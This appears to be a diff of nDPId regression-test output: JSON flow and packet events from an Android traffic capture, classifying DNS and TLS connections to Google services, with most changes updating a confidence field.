00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1582454868597,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454868597,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBqkFAAEARCwnAqAIQwKgCAcjmADUALYwU2tsBAAABAAAAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAQ=="} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1582454868597,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454868597,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRZjUAAEARjwXAqAIBwKgCEAA1yOYAPQ9d2tuBgAABAAEAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAcAMAAEAAQAAAEEABKzZqM4="} -00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.168.206"}} -00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":144,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -02253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":146,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3903,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","alpn":"http\/1.1","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}} +00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.168.206"}} +00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":144,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +02253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":146,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3903,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","alpn":"http\/1.1","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1582454868606,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":114,"pkt_l4_len":60,"thread_ts_msec":1582454868606,"pkt":"MzMAAQACTGr2n\/Ynht1gBNipADwRAf6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAQACAiICIwA8Uc8B2OT+AAEADgABAAEl5RSOTGr2n\/YnAAMADA4ACMoAAAAAAAAAAAAIAAIAAAAGAAQAFwAY"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1582454868843,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868843,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8fo0AAHYGRJqs2RIDwKgCEAG7kBjGuYRJgnUILaAS6yAZNAAAAgQFZAQCCApRt9Th\/\/80QwEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1582454868844,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868844,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0PHBAAEAGfL\/AqAIQrNkSA5AYAbuCdQgtxrmESoAQAVcxKAAAAQEICv\/\/NJZRt9Th"} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868511,"flow_last_seen":1582454868936,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868936,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868511,"flow_last_seen":1582454868936,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868936,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00874{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868511,"flow_last_seen":1582454869031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":872,"flow_tot_l4_payload_len":1067,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1582454869031,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869361,"flow_last_seen":1582454869361,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454869361,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1582454869361,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1582454869361,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA+qnVAAEARCtjAqAIQwKgCAZhgADUAKv996DEBAAABAAAAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAQ=="} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869361,"flow_last_seen":1582454869361,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454869361,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869361,"flow_last_seen":1582454869361,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454869361,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1582454869363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1582454869363,"pkt":"TGr2n\/YnxiwDYGpkCABFAABORPIAAEARsEvAqAIBwKgCEAA1mGAAOr6H6DGBgAABAAEAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":166,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869361,"flow_last_seen":1582454869363,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454869363,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":166,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869361,"flow_last_seen":1582454869363,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454869363,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869517,"flow_last_seen":1582454869517,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454869517,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1582454869517,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869517,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8ooxAAEAGf8\/AqAIQrNmozsTQAbv86pehAAAAAKAC\/\/+fWQAAAgQFtAQCCAr\/\/zUtAAAAAAEDAwg="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1582454869556,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869556,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA80VwAAHUGW\/+s2ajOwKgCEAG7xNCPRbjJ\/OqXoqAS6yAGLQAAAgQFZAQCCApmsf+J\/\/81LQEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1582454869557,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454869557,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0oo1AAEAGf9bAqAIQrNmozsTQAbv86peij0W4yoAQAVceWQAAAQEICv\/\/NUhmsf+J"} -00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454869517,"flow_last_seen":1582454869614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454869614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454869517,"flow_last_seen":1582454869614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454869614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869626,"flow_last_seen":1582454869626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454869626,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1582454869626,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869626,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8g2ZAAEAG9TXAqAIQ2O8meMFmFGxVMrY\/AAAAAKAC\/\/9vQQAAAgQFtAQCCAr\/\/zVZAAAAAAEDAwg="} -00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":176,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":423,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","server_names":"*.google-analytics.com,*.fps.goog,app-measurement.com,fps.goog,google-analytics.com,googleoptimize.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googleoptimize.com,www.googletagmanager.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google-analytics.com","alpn":"http\/1.1","fingerprint":"B0:D9:D3:57:C2:34:87:2C:FB:F5:E6:BD:7F:9F:54:65:08:61:AF:01"}} 